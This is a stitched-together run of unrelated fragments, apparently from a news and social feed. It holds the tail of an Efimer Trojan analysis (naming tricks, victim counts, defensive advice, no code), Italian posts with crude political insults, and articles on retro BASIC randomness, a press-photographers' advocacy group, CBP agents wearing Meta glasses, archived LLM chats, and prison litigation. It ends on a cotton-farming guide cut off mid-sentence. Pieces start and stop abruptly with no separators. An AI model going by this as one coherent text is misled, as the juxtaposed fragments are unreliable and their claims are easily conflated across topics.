Throughout the code, you’ll frequently encounter the term “Liame”, which is simply “Email” spelled backwards. Similarly, variations like “Liama”, “Liam”, and “Liams” are also present, likely derived from “Liame”. This kind of “wordplay” in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named “PageGetEmail” function, you’d find “PageGetLiame”.
Victims
From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany.
TOP 10 countries by the number of users who encountered Efimer (download)
Takeaways
The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices.
Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company.
It’s important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases.
For website developers and administrators, it’s crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach.
The Boys con Marc Valentine in Italia a Settembre per cinque concerti. freezonemagazine.com/news/marc… Arrivano a Settembre nel nostro paese The Boys con Marc Valentine per una serie di cinque concerti che si preannunciano molto interessanti. The Boys sono una delle leggende del Punk Uk. Nati dalla fuoriuscita di Matt Dagerfield dai London SS che unì le forze con Casino Steel, cui si affiancarono Honest John
Although these days we get to tap into many sources of entropy to give a pretty good illusion of randomness, home computers back in the 1980s weren’t so lucky. Despite this, their random number generators were good enough for games and such, as demonstrated by the [CoCo Town] YouTube channel.
The CoCo is the nickname for the TRS-80 Color Computer, which despite its name, shares absolutely nothing with the TRS-80. Its BASIC version is called Color BASIC, which like many others was based on Microsoft BASIC, so the video’s description should be valid for many other BASIC versions as well. In the video we’re first taken through a basic summary of what the floating point format is all about, before running through an example of the algorithm used by Color BASIC for its RND function, using a test program written in Color BASIC.
As described in the video, the used algorithm appears to be the linear congruential generator, which is a pseudo-random generator that requires minimal resources from the hardware it runs on. Of course, its main disadvantage is that it will fairly rapidly begin to repeat itself, especially with a limited number of output bits. This makes it a decent choice even today for something like simple game logic where you just want to get some variation without aiming for cryptographically secure levels of randomness.
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Trump ha chiesto le dimissioni immediate dell'amministratore delegato di Intel, Lip-Bu Tan, accusato di conflitto di interessi con la Cina: in effetti l'imprenditore ha investito in molte aziende cinesi e Cadence Design (l'azienda che ha
For decades, one organization has dedicated itself to protecting the rights of news photographers and videographers. The National Press Photographers Association has led countless First Amendment battles to protect visual journalists’ right to document and the public’s right to see and hear the news.
The organization’s general counsel, Mickey Osterreicher, is often at the forefront of those fights. He and NPPA have protected the First Amendment right to record in public, limited senseless government regulations restricting photography and recording, and even won a groundbreaking settlement with the New York Police Department over its treatment of journalists at protests.
But recently, NPPA announced that it faces financial difficulties. Freedom of the Press Foundation (FPF) spoke to Osterreicher about NPPA’s work and the impact on the First Amendment if it shutters. You can read our full conversation below, and you can donate to NPPA’s programs here.
You’ve been NPPA’s general counsel since 2005, and you’ve also been a news photographer. How have the legal issues facing visual journalists changed over the years, and what are the most pressing issues they face today?
Both from a practical and legal standpoint, being a journalist was a lot simpler when I was a photojournalist. One of the biggest challenges I now face is trying to answer the question from police and lawmakers, “Who is a journalist?” and, during a protest, “Who gets to stay after an order to disperse?”
But once those press access rights have been attained, what good is it if visual journalists cannot make a decent living after risking their health and safety because their images are being misappropriated without permission, credit, or compensation? So it is a combination of dealing with First Amendment and copyright issues that keeps me up most nights.
That is to say nothing of the exponential use of generative artificial intelligence that has economically impacted the market for news photography as well as creating ethical challenges for visual journalists and public perception.
Tell us more about how the rise of AI-generated images and deepfakes is affecting the work and rights of visual journalists.
For visual journalism, generative artificial intelligence is the worst of both worlds, where millions of images (still and video) are ingested to train AI models without payment to the creators and the public can no longer believe what they see without wondering if what they are viewing is a true depiction of what really happened or an artificially created image. Even worse, this technology now provides an additional layer of ambiguity to those who claim that actual images of real events are “fake news.”
You’ve trained many law enforcement officers about journalists’ First Amendment rights, especially when they’re covering political conventions and protests. What are the most important things for police officers to know about press freedom, and how is NPPA uniquely positioned to provide that training?
I have three goals when training police and journalists about press freedoms. One: that police are not sued for abridging First Amendment rights of citizens and journalists, costing taxpayers dearly with money that could be better spent for police recruitment and retention or equipment. Two: that journalists are able to do their jobs without being harassed, injured, or arrested. Three: that the public is informed, which is the basis for the First Amendment — that being the desire by the founding fathers for the right of the public to receive information, and be an informed electorate.
As “the voice of visual journalists” since 1946, NPPA is uniquely positioned to foster improved police-press-public relations in an era when it is most needed by instilling greater respect for the roles each plays in our democracy. We’ve provided these trainings to law enforcement agencies nationwide for almost 20 years, with scores of departments and hundreds of officers being trained, including the entire Minnesota State Patrol as part of the settlement terms of a federal civil rights lawsuit, as well as the start of training with the NYPD regarding the new policies and procedures implemented as a result of the settlement of our lawsuit.
“Should our voice be muted, its silence will be deafening.“
Mickey Osterreicher
What I believe also adds to NPPA’s credibility is my background as a photojournalist with over forty years’ experience in print and broadcast, my experience as a First Amendment attorney, and my understanding of the challenges facing law enforcement from having been a uniformed reserve deputy sheriff with the Erie County Sheriff’s Office since 1976 and working closely with law enforcement through various associations and committees.
That experience working with police departments — which not many press freedom organizations have — has also allowed you to get involved in many other issues that are important to all journalists, not just visual ones. Tell us about your work on police radio encryption and other ways you’re able to leverage the work you’ve done training police departments.
The encryption of police radio transmissions is a growing problem nationwide, because for almost a century, newsrooms and journalists have relied on the monitoring of those broadcasts to cover breaking news and other matters of public concern.
One place where such coverage is critical is New York City, where so many newsworthy events occur and where, because of the congested vehicle traffic, time is of the essence in getting to the scene. A few years ago, the NYPD announced that it would begin encrypting its transmissions. NPPA joined a consortium of news organizations asking to work with NYPD to allow journalists to continue to have real-time access to those broadcasts. Despite meeting with police officials, testifying before the city council and submitting a white paper on the subject, the NYPD has refused to discuss this issue further, and many of the important police frequencies have already been encrypted.
The consortium then supported a state bill that would allow for press access. That bill passed both houses and is awaiting the governor’s signature. NPPA has also worked with press groups around the country to address this issue.
Another problem we helped to solve was an exemption for journalists to a New York law that banned anyone in the state (except for certain “eligible professions”) from the “purchase, taking possession of, sale, exchange, giving or disposing of body armor.”
Additionally, NPPA was instrumental in opposing an Arizona bill that barred anyone recording police from getting closer than 15 feet to an officer without their permission. I drafted several letters to the legislature joined by 30 press organizations cautioning against the unconstitutionality of the proposed law, which was ultimately passed after the measure was amended to an 8-foot distance. I then worked with the American Civil Liberties Union and Arizona Broadcasters Association to obtain a permanent injunction prohibiting enforcement of the law. NPPA has also filed amicus briefs in two other constitutional challenges to similar laws in Indiana and Louisiana.
When the White House restricted the Associated Press’s access over its use of the term ‘Gulf of Mexico’ (a move thatNPPA andFPF condemned), it raised concerns about the chilling effects of such retaliation on journalists. If presidents can exclude outlets or photographers from the press pool for editorial decisions, what does that mean for press freedom and the role of visual journalists?
As NPPA stated, such actions by the administration are unacceptable as both an attempt at prior restraint and a blatant retaliation and chilling abridgment of the First Amendment rights of the AP and its journalists.
Unfortunately, we have seen both the federal district court as well as the circuit court hearing the appeal in this case give wide latitude and discretion to the White House as to who it admits to cover certain events. Additional fallout from this has been the White House Correspondents Association losing its long-standing control over the press pool rotation as well as other “disfavored” media outlets being barred from inclusion in the pool.
All these actions taken by the administration are having a chilling effect on press coverage of the government and are eviscerating press freedom. The NPPA continues to work with news and press freedom organizations to advocate and support the right of the public to be informed.
Over the years, NPPA has had to oppose a number of laws that prohibit or limit taking pictures in public places as well as using drones to capture aerial footage. What should journalists do if they’re stopped and told they can’t take pictures or record in public?
Our staunch advocacy has led to the right to photograph and record in traditional public forums being “clearly established” in three-quarters of the U.S. Circuit Courts of Appeal, which is key to successfully bringing civil rights claims against those who try to limit or interfere with those rights.
While NPPA was initially successful in challenging Texas drone regulations, that decision was reversed on appeal. But we have been effective in ensuring that language protecting the First Amendment rights of journalists to use drones for newsgathering be included in government regulations.
NPPA has provided extensive training as to what journalists can do if they’re stopped and told they can’t take pictures or record in public. The foremost advice is to meet with law enforcement on a regular basis to ensure that these rights are honored by police and to discuss how best to improve police-press interactions. While in the field, it is crucial to maintain situational awareness and pay attention to police and crowd movements to avoid being encircled (kettled). Always have an exit strategy, as it is always better to move to a different location than be arrested. If police stop or question you about your activities, make sure to identify yourself as a journalist.
What will journalism lose if NPPA is forced to close its doors?
It would be a significant loss to not only visual journalists but to journalism itself if NPPA were to cease as an organization. For almost 80 years, NPPA has strongly advocated for the rights of visual journalists and now more than ever that unique voice is needed as more journalists are required to report not only with words but images. It also comes at a time when the importance of truthful images could not be greater.
While there are many other organizations supporting the First Amendment and press freedoms, none is more exclusively dedicated to the advancement and protection of visual journalism in its role as a vital public service than the NPPA. Our code of ethics is often cited as exemplary of what visual journalism should strive to achieve. Should our voice be muted, its silence will be deafening.
@Giornalismo e disordine informativo articolo21.org/2025/08/federic… Undici anni fa, l’8 agosto 2014, ci ha lasciato Federico Orlando, fondatore e primo presidente di Articolo 21. “Federico, che sensazioni provi a marciare tra tutte queste bandiere rosse?”Gli chiedemmo in occasione della prima
Video obtained and verified by 404 Media shows a CBP official wearing Meta's AI glasses, which are capable of recording and connecting with AI. “I think it should be seen in the context of an agency that is really encouraging its agents to actively intimidate and terrorize people," one expert said.#CBP #Immigration #Meta
A CBP Agent Wore Meta Smart Glasses to an Immigration Raid in Los Angeles
A Customs and Border Protection (CBP) agent wore Meta’s AI smart glasses to a June 30 immigration raid outside a Home Depot in Cypress Park, Los Angeles, according to photos and videos of the agent verified by 404 Media.
Meta does not have a contract with CBP, and 404 Media was unable to confirm whether or not the agent recorded any video using the smart glasses at the raid. Based on what we know so far, this appears to be a one-off case of an agent either wearing his personal device to an immigration raid, or CBP trying technology on an ad-hoc basis without a formal procurement process. Civil liberties and privacy experts told 404 Media, however, that even on a one-off basis, it signals that law enforcement agents are interested in smart glasses technology and that the wearing of smart glasses in an immigration raid context is highly concerning.
“There’s a nonzero chance the agent bought the Meta smart glasses because they wanted it for themselves and it’s the glasses they like to wear. But even if that’s the case, it’s worth pointing out that there are regulatory things that need to be thought through, and this stuff can trickle down to officers on an individual basis,” Jake Laperruque, deputy director of the Center for Democracy and Technology’s security and surveillance project, told 404 Media. “There needs to be compliance with rules and laws even if a technology is not handed out through the department. The questions around [smart glasses are ones] we’re going to have to grapple with very soon and they’re pretty alarming.” The glasses were worn by a CBP agent outside of a Home Depot in Cypress Park, Los Angeles during a June 30 immigration raid which happened amid weeks of protests, the deployment of the National Guard and the Marines, and during which immigration enforcement in Los Angeles has become a flashpoint in the Trump administration’s mass deportation campaign and the backlash to it. 404 Media obtained multiple photos and videos of the CBP agent wearing the Meta glasses and verified that the footage and videos were taken outside of the Cypress Park Home Depot during an immigration raid. The agent in the photo is wearing Meta’s Ray Ban AI glasses, a mask, and a CBP uniform and patch. CBP did not respond to multiple requests for comment.
0:00 /0:15 1×
In the video, a CBP agent motions to the person filming the video to back up. The Meta Ray Ban AI glasses are clearly visible on the agent’s face.
Meta’s AI smart glasses currently feature a camera, live-streaming capabilities, integration with Meta’s AI assistant, three microphones, and image and scene recognition capabilities through Meta AI. The Information reported that Meta is considering adding facial recognition capabilities to the device, though they do not currently have that functionality. When filming, a recording light on Meta’s smart glasses turns on; in the photos and brief video 404 Media has seen, the light is not on.
💡 Do you know anything else about this? I would love to hear from you. Using a non-work device, you can message me securely on Signal at jason.404. Otherwise, send me an email at jason@404media.co.
Multiple experts 404 Media spoke to said that these smart glasses qualify as a body worn camera under the Department of Homeland Security’s and Customs and Border Protection’s video recording policies. CBP’s policy states that “no personally owned devices may be used in lieu of IDVRS [Incident Driven Video Recording Systems] to record law enforcement encounters,” and that “recorded data shall not be downloaded or recorded for personal use or posted onto a personally owned device.” DHS’s policy states “the use of personally owned [Body Worn Cameras] or other video, audio, or digital recording devices to record official law enforcement activities is prohibited.”
Under the Trump administration, however, enforcement of regulations for law enforcement engaging in immigration raids is largely out the window.
“I think it should be seen in the context of an agency that is really encouraging its agents to actively intimidate and terrorize people. Use of cameras can be seen as part of that,” Jay Stanley, a senior policy analyst at the ACLU, told 404 Media. “It’s in line with the masking that we’ve seen, and generally behavior that’s intended to terrorize people, masking failure to identify themselves, failure to wear clear uniforms, smashing windows, etc. A big part of why this is problematic is the utter lack of policy oversight here. If an agent videotapes themselves engaging in abusive activity, are they going to be able to bury that video? Are they going to be able to turn it on and off on the fly or edit it later? There are all kinds of abuses that can happen with these without regulation and enforcement of those regulations, and the prospects of that happening in this administration seem dim.” playlist.megaphone.fm?p=TBIEA2… When reached for comment, a Meta spokesperson asked 404 Media a series of questions about the framing of the article, and stressed that Meta does not have any contract with CBP. They then asked why Meta would be mentioned in the article at all: “I’m curious if you can explain why it is Meta will be mentioned by name in this piece when in previous 404 reporting regarding ICE facial recognition app and follow up reporting the term ‘smartphones’ or ‘phone’ is used despite ICE agents clearly using Apple iPhones and Android devices,” they said. Meta ultimately declined to comment for this story.
Meta also recently signed a partnership deal with defense contractor Anduril to offer AI, augmented reality, and virtual reality capabilities to the military through Meta’s Reality Labs division, which also makes the Meta smart glasses (though it is unclear what form this technology will take or what its capabilities will be). Earlier this year, Meta relaxed its content moderation policies on hate speech regarding the dehumanization of immigrants, and last month Meta’s CTO Andrew Bosworth was named an Army Reserve Lt. Colonel by the Trump administration.
“Meta has spent the last decade building AI and AR to enable the computing platform of the future,” Meta CEO Mark Zuckerberg said in a press release announcing the deal with Anduril. “We’re proud to partner with Anduril to help bring these technologies to the American servicemembers that protect our interests at home and abroad.”
“My mission has long been to turn warfighters into technomancers, and the products we are building with Meta do just that,” Anduril founder Palmer Luckey said in the press release.
In a recent earnings call, Zuckerberg said he believes smart glasses will become the primary way people interact with AI. “I think in the future, if you don’t have glasses that have AI or some way to interact with AI, I think you’re kind of similarly, probably [will] be at a pretty significant cognitive disadvantage compared to other people and who you’re working with, or competing against,” he said during the call. “That’s also going to unlock a lot of value where you can just interact with an AI system throughout the day in this multimodal way. It can see the content around you, it can generate a UI for you, show you information and be helpful.”
Immigrations and Customs Enforcement has recently gained access to a new facial recognition smartphone app called Mobile Fortify that is connected to several massive government databases, showing that DHS is interested in facial recognition tech.
Privacy and civil liberties experts told 404 Media that this broader context—with Meta heavily marketing its smart glasses while simultaneously getting into military contracting, and the Department of Homeland Security increasingly interested in facial recognition—means that seeing a CBP agent wearing Meta AI glasses in the field is alarming.
“Regardless of whether this was a personal choice by this agent or whether somehow CBP facilitated the use of these meta glasses, the fact that it was worn by this agent is disturbing,” Jeramie Scott, senior counsel and director of the Electronic Information Privacy Center told 404 Media. “Having this type of technology on a law enforcement agent starts heading toward the tactics of authoritarian governments who love to use facial recognition to try to suppress opposition.”
The fact is that Meta is at the forefront of popularizing smart glasses, which are not yet a widely adopted technology. The privacy practices and functionality of the glasses is, at the moment, largely being guided by Meta, whereas smartphones are a largely commodified technology at this point. And it’s clear that this consumer technology that the company markets on billboards as a cool way to record videos for Instagram is seen by some in law enforcement as enticing.
“It’s clear that whatever imaginary boundary there was between consumer surveillance tech and government surveillance tech is now completely erased,” Chris Gilliard, co-director of The Critical Internet Studies Institute and author of the forthcoming book Luxury Surveillance, told 404 Media.
“The fact is when you bring powerful new surveillance capabilities into the marketplace, they can be used for a range of purposes including abusive ones. And that needs to be thought through before you bring things like that into the marketplace,” the ACLU’s Stanley said.
Laperruque, of the CDT, said perhaps we should think about Meta smart glasses in the same way we think about other body cameras: “On the one hand, there’s a big difference between glasses with a computer built into them and a pair of Oakleys,” he said. “They’re not the only ones who make cameras you attach to your body. On the other hand, if that’s going to be the comparison, then let’s talk about this in the context of companies like Axon and other body-worn cameras.”
Update: After this article was published, the independent journalist Mel Buer (who runs the site Words About Work) reposted images she took at a July 7 immigration enforcement raid at MacArthur Park in Los Angeles. In Buer's footage and photos, two additional CBP agents can be seen wearing Meta smart glasses in the back of a truck; a third is holding a camera pointed out of the back of the truck. Buer gave 404 Media permission to republish the photos; you can find her work here.
israele vuole liberare gaza... anche i russi vogliono liberare l'ucraina. si vede l'amore per le popolazioni locali da liberare in entrambi i casi. traspare proprio.
ma la verità è che la frase contempla nel finale "...liberare l'ucraina dagli ucraini e e gaza dai gazawi[e palestinesi in toto]ma non gli fanno mai completare la frase, sarà leccaculismo!? 🤔😑🤐
oltretutto chi sposta la produzione negli usa sposterà parte di produzione... non può spostare tutto. per importare dall'italia magari materie prime o parti comunque necessarie dovrà lo stesso pagare i dazzi... davvero utile quindi alla fine è comunque un'inculata e non conviene. in un mondo globalizzato come questo è veramente assurda la logica di trump. più tasse per tutti (negli usa)
These days the president of the United States files frivolous lawsuits at an alarming clip, including against news outlets that displease him. He’s far from the only prominent public figure abusing the federal court system in this way, steering scarce judicial resources away from meritorious lawsuits by ordinary people who have suffered serious damages.
And yet, Congress has not seen fit to pass a federal “anti-SLAPP” law to stop billionaires and politicians from pursuing strategic lawsuits against public participation. But powerless prisoners? That’s another story. If they want access to the federal courts they need to navigate the Prison Litigation Reform Act — a maze of onerous procedural requirements. It’s supposedly intended to stop the courts from being burdened by inmates’ frivolous lawsuits.
We held a webinar to discuss the PLRA’s impact on incarcerated journalists and the journalists on the outside who cover the prison system, featuring Jeremy Busby, a journalist and Freedom of the Press Foundation (FPF) columnist who is incarcerated in Texas, and American Civil Liberties Union attorneys Nina Patel and Corene Kendrick. Patel is senior policy counsel at the ACLU Justice Division and Kendrick is the deputy director of the ACLU’s National Prison Project.
As Kendrick explained, the PLRA originated as one of the Clinton administration’s “tough on crime” initiatives as it pivoted right in preparation for the 1996 presidential election. The law was enacted despite a lack of evidence that incarcerated people file baseless lawsuits any more frequently than anyone else, presidents or otherwise. She said the law “singles out one disfavored group of people and categorically denies them equal access to the courts.”
She described how the harm extends beyond the impacted litigants, as the kinds of court filings foreclosed by the PLRA are “oftentimes the best way that information about conditions in our nation’s prisons and jails reach the public and members of the media.”
“The PLRA has, in practice, served as a real barrier for journalists to get any sort of information” about facilities that “get billions and billions of dollars a year to lock up human beings,” Kendrick said. “The ability to communicate with the outside world is so circumscribed and is monitored and recorded. And you know, once something gets to a federal court and it’s filed on the docket, it is out there.”
But when the court dismisses a case for procedural reasons without any consideration of whether the claims are true, all journalists are left with are untested allegations that they rarely have the resources to corroborate. “That happens all the time, and unfortunately, and it adversely affects journalists greatly,” Kendrick said.
Lawsuits are also the only recourse available to incarcerated journalists, who often report relentless retaliation when their work upsets prison officials. That’s what happened to Busby when he helped expose deplorable conditions inside the prison where he was housed when the COVID-19 pandemic hit in 2020. Busby said he was transferred to four prisons, each overcrowded with people sick with COVID, before landing in a cell without a mattress or sheets, where he was kept for six weeks. His property was damaged or seized, and he was written bogus disciplinary charges that were later overturned.
He brought a federal lawsuit, but because he was retaliated against in four different prisons, the judge said the PLRA required four separate lawsuits in four different courts. “I wasn’t able to successfully keep up with four active litigations in four different courts in four different counties, from the solitary confinement cell that I was being held in,” Busby explained, resulting in his lawsuits each being dismissed on procedural grounds before the merits of his claims could be adjudicated.
Busby is a college graduate and accomplished writer — if he can’t navigate the PLRA, it is all the more difficult for an average member of the prison population to do so. Even the experienced lawyers on the webinar acknowledged how challenging it can be to comply with the PLRA when representing their incarcerated clients. Incarcerated litigants, Busby noted, must also pay court fees — in his case, a $400 fee became $1,600 when his lawsuit was split into four.
“You don’t get paid for work here in Texas, and so most guys, they don’t even want the $400 thing against their account because their family members can maybe send $20 for toothpaste and deodorant every month or so, or every two or three months, and they don’t want to sacrifice their deodorant and toothpaste money to pursue this lawsuit,” he said.
So what’s the point of the PLRA? As Patel noted, “The courts are well equipped to throw out lawsuits that are frivolous,” and do so every day in cases involving non-incarcerated people. Patel believes the real problem the PLRA is meant to address isn’t that incarcerated people file so many invalid claims — it’s that they file so many valid ones.
With around two million people incarcerated in the United States, “a functional system where someone can go to the courts and have their constitutional violations in prison litigated and then compensated would break most prison systems in this country,” Patel explained. “That is the dirty truth of the PLRA.”
She added, “Everyone knows, and it’s not a secret, that it would bankrupt the system, and it would break it, and that we couldn’t do what we do in this country, which is lead the world in mass incarceration.”
Note: FPF Advocacy Director Seth Stern, who authored this article and moderated the webinar, is on the board of Busby’s nonprofit organization,JoinJeremy.
ma che fine hanno fatto tutti quelli che prima delle elezioni osannavano tanto trump... negando persino i fatti tipo il suo tentato colpo di stato di 4 anni prima... eh beh... adesso che ha vinto siete tutti contenti? coglioni... bella la vostra idea di destra...
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁) Tsmc sarà esentata dai dazi al 100 per cento sui microchip imposti da Trump. Ottima notizia per l'azienda e per l'intera economia di Taiwan. Ma le tensioni commerciali con l'America non sono risolte.
Un gruppo di grandi istituzioni finanziarie internazionali, tra cui J.P. Morgan Chase, Ing e Commerzbank, ha deciso di accettare la sfida della banca multilaterale pensata per portare avanti i progetti di difesa dell’Europa e dei suoi alleati. La Defence, Security and Resilience Bank (Dsrb) infatti si pone l’obiettivo
Preservationists at the Video Game History Foundation purchased the rights to Computer Entertainer, the first video game magazine ever written and uploaded it for free.#News #VideoGames #archiving
Archivists Let You Now Read Some of the First Ever Reviews of Mario and Zelda
Some of the first reviews ever written for the original Legend of Zelda and Super Mario Bros. have been digitized and published by the Video Game History Foundation. The reviews appeared in Computer Entertainer, an early video game magazine that ran from 1982 to 1990. The archivists at the Foundation tracked down the magazine’s entire run and have published it all online under a Creative Commons license.
Computer Entertainer has a fascinating history. It was one of the only magazines to cover video games during the market crash of the mid 1980s. “Simply put, there weren't other video game magazines in this era, at least in the United States,” Phil Salvador, the Library Director at the VGHF, told 404 Media. “In many cases, this is the only American coverage we have for this period.” playlist.megaphone.fm?p=TBIEA2… “If we want to understand video game history, we need more than the games themselves. We need to understand how they were talked about and how they were made. Primary sources from the early years of the video game industry like Computer Entertainer are scarce. They give us insight into the story of video games that there's no way to reproduce,” Salvador said. Image via VGHF. Computer Entertainer was the newsletter for the Video Take-Out, a company that sold video games through the mail. “Because they were focused on retail products, they kept on top of the video game release calendar in a way that no other enthusiast magazine did in the 1980s,” Salvador said. “This magazine is one of the only reliable sources of American release dates for computer and console games during this era. Look up any console game from the 1980s on Wikipedia, and chances are, the American release date in the article comes from Computer Entertainer.” youtube.com/embed/YnckC-JuOR0?… Digging through the archives, I found the original Legend of Zelda review and read through a year’s worth of hype and handwringing leading up to its release. Computer Entertainer was on hand at CES to talk to the unproven Nintendo in February 1987. Zelda was already out in Japan, where it ran on the disk-based Famicom system.
The CE write-up noted that the NES was a cartridge system and that Nintendo had to make unheard of adjustments to make the game work right. “A Nintendo spokesperson told us that they have included a lithium battery with a 5-year life span in the cartridge to allow it to save information you need, so the disk drive is not needed,” CE wrote. Image via VGHF. Convincing Americans to buy a Famicom-style disk drive after they’d already bought the NES was thought to be a hard sell. “We do feel, however, that it is just a question of time before Nintendo introduces the disk drive in the U.S,” CE said. “Also, for the avid long-term gamer (count all our readers in that category!), the 5-year battery could prove frustrating as, when the battery dies, so does all the character information that has been stored on the cartridge.” CE needn’t have worried. Many of those batteries are still working today, almost 40 years later, and there’s a robust aftermarket in replacement parts when they fail.
Legend of Zelda finally came out in August of 1987 and CE gave it a glowing review, rating it 3.5 out of 4 stars. In the same issue, it gave Leisure Suit Larry and the Land of the Lounge Lizards a perfect 4 out of 4 stars. “There’s certainly no socially redeeming value to the game, which is what makes it so much fun,” CE said of the adventure game that would have nowhere near the cultural or social impact of Link and Zelda. Image via VGHF. “It's a totally different perspective to see someone trying towrap their head around the original Super Mario Bros., or expressing skepticism aboutthe idea of Nintendo selling a game console in the United States,” Salvador said.
The 1980s was a different era of games writing. “[Computer Entertainer] covered video and computer games as a function of their retail business to help customers better understand the game market,” Salvador said. “Being able to look back on what retailers thought about the game business back in the 1980s is a huge historical boon, but today, there's understandably more questions about the role of game criticism. Does it still make sense to cover games the same way Computer Entertainer did 40 years ago?”
La Marina Australiana ha scelto la Mitsubishi per costruire la sua prossima generazione di fregate. Pochi giorni fa, il ministero della Difesa australiano ha infatti annunciato che la versione potenziata della classe “Mogami”
More than 130,000 Claude, Grok, ChatGPT, and Other LLM Chats Readable on Archive.org
A researcher has found that more than 130,000 conversations with AI chatbots including Claude, Grok, ChatGPT, and others are discoverable on the Internet Archive, highlighting how peoples’ interactions with LLMs may be publicly archived if users are not careful with the sharing settings they may enable.
The news follows earlier findings that Google was indexing ChatGPT conversations that users had set to share, despite potentially not understanding that these chats were now viewable by anyone, and not just those they intended to share the chats with. OpenAI had also not taken steps to ensure these conversations could be indexed by Google.
“I obtained URLs for: Grok, Mistral, Qwen, Claude, and Copilot,” the researcher, who goes by the handle dead1nfluence, told 404 Media. They also found material related to ChatGPT, but said “OpenAI has had the ChatGPT[.]com/share links removed it seems.” Searching on the Internet Archive now for ChatGPT share links does not return any results, while Grok results, for example, are still available.
Dead1nfluence wrote a blog post about some of their findings on Sunday and shared the list of more than 130,000 archived LLM chat links with 404 Media. They also shared some of the contents of those chats that they had scraped. Dead1nfluence wrote that they found API keys and other exposed information that could be useful to a hacker. playlist.megaphone.fm?p=TBIEA2… “While these providers do tell their users that the shared links are public to anyone, I think that most who have used this feature would not have expected that these links could be findable by anyone, and certainly not indexed and readily available for others to view,” dead1nfluence wrote in their blog post. “This could prove to be a very valuable data source for attackers and red teamers alike. With this, I can now search the dataset at any time for target companies to see if employees may have disclosed sensitive information by accident.”
404 Media verified some of dead1influence’s findings by discovering specific material they flagged in the dataset, then going to the still-public LLM link and checking the content.
💡 Do you know anything else about this? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.
Most of the companies whose AI tools are included in the dataset did not respond to a request for comment. Microsoft which owns Copilot acknowledged a request for comment but didn't provide a response in time for publication. A spokesperson for Anthrophic, which owns Claude, told 404 Media: “We give people control over sharing their Claude conversations publicly, and in keeping with our privacy principles, we do not share chat directories or sitemaps with search engines like Google. These shareable links are not guessable or discoverable unless people choose to publicize them themselves. When someone shares a conversation, they are making that content publicly accessible, and like other public web content, it may be archived by third-party services. In our review of the sample archived conversations shared with us, these were either manually requested to be indexed by a person with access to the link or submitted by independent archivist organizations who discovered the URLs after they were published elsewhere across the internet first.” 404 Media only shared a small sample of the Claude links with Anthrophic, not the entire list.
Fast Company first reported that Google was indexing some ChatGPT conversations on July 30. This was because of a sharing feature ChatGPT had that allowed users to send a link to a ChatGPT conversation to someone else. OpenAI disabled the sharing feature in response. OpenAI CISO Dane Stuckey said in a previous statement sent to 404 Media: “This was a short-lived experiment to help people discover useful conversations. This feature required users to opt-in, first by picking a chat to share, then by clicking a checkbox for it to be shared with search engines.”
A researcher who requested anonymity gave 404 Media access to a dataset of nearly 100,000 ChatGPT conversations indexed on Google. 404 Media found those included the alleged texts of non-disclosure agreements, discussions of confidential contracts, and people trying to use ChatGPT for relationship issues.
Others also found that the Internet Archive contained archived LLM chats.
Dopo il mio articolo sulla formazione sistemica, un intervento di Wolfgang Ulrich che dice la sua sull'argomento. C'è una affinità interessante fra clinici che perseguono il progetto di una connessione fra il sé professionale e quello, diciamo, privato, in un modo lontano e alternativo alle logiche della cosiddetta "integrazione". Dal mio blog (che mi procura tante soddisfazioni).
@Notizie dall'Italia e dal mondo Dopo le aggressioni delle scorse settimane, mai cessate del tutto, più di 170.000 sfollati sono arrivati a Suwayda da aree rurali devastate. Oltre 32 villaggi sono stati bruciati, saccheggiati e resi inabitabili L'articolo SIRIA. Suwayda sotto assedio. Diario da una
Cotton farming, known as the "white gold" of agriculture, remains one of the most vital pillars of the global textile economy. In 2025, it not only supports millions of livelihoods but is also evolving rapidly driven by cutting-edge technologies, sustainable practices, and precision agriculture. Whether you’re a first-time grower or an experienced farmer, understanding how cotton is grown today can help you achieve higher yields, reduce costs, and farm more responsibly. What is Cotton? Cotton is a soft, fluffy natural fiber that grows around the seeds of the Gossypium plant. It’s used worldwide to manufacture clothing, bedding, industrial fabrics, and even paper products. Beyond fiber, cottonseeds are processed into oil and livestock feed, making it a multi-utility crop with immense commercial value. Major Cotton-Growing Countries As of 2025, the top cotton-producing nations include: • India – World's largest cotton cultivator and consumer • China – Heavy focus on high-yield, mechanized cotton • United States – Known for exporting premium quality lint • Pakistan – Major grower of short-staple cotton • Brazil – Emerging leader in sustainable cotton exports These countries benefit from suitable climates, advanced genetics, and extensive research infrastructure. Suitable Conditions for Cotton Cotton is a warm-season crop that demands specific conditions: Factor Ideal Range Temperature 21°C to 30°C Rainfall 600 mm to 1,200 mm annually Soil Type Sandy loam or black cotton soils Soil pH 6.0 – 7.5 Growing Period 150–180 days (depends on variety) It cannot tolerate frost and grows best in sunny, dry weather with low humidity during boll opening. Preparing the Farm for Cotton Effective land preparation sets the stage for a productive crop. Here’s how: • Soil testing: Identifies pH, nutrient levels, and deficiencies • Primary tillage: Deep plowing helps break hardpan and increase root penetration • Secondary tillage: Harrowing and leveling using laser tools improve irrigation efficiency • Organic additions: Apply farmyard manure or compost 2–3 weeks before sowing Modern farmers also use biochar or vermicompost to enhance soil microbial activity and moisture retention. Selecting Cotton Varieties Choosing the right variety can significantly affect your yield and pest resistance. In 2025, the popular categories include: • Bt Cotton: Genetically engineered to fight bollworms • Hybrid Cotton: High-yielding but requires more inputs • Desi Varieties: Hardy, pest-tolerant, and ideal for organic farming • High-Density Varieties: Used in HDPS systems for closer spacing and better land utilization • Drought-tolerant Strains: Designed for water-scarce areas Seed Treatment Before Sowing Treated seeds 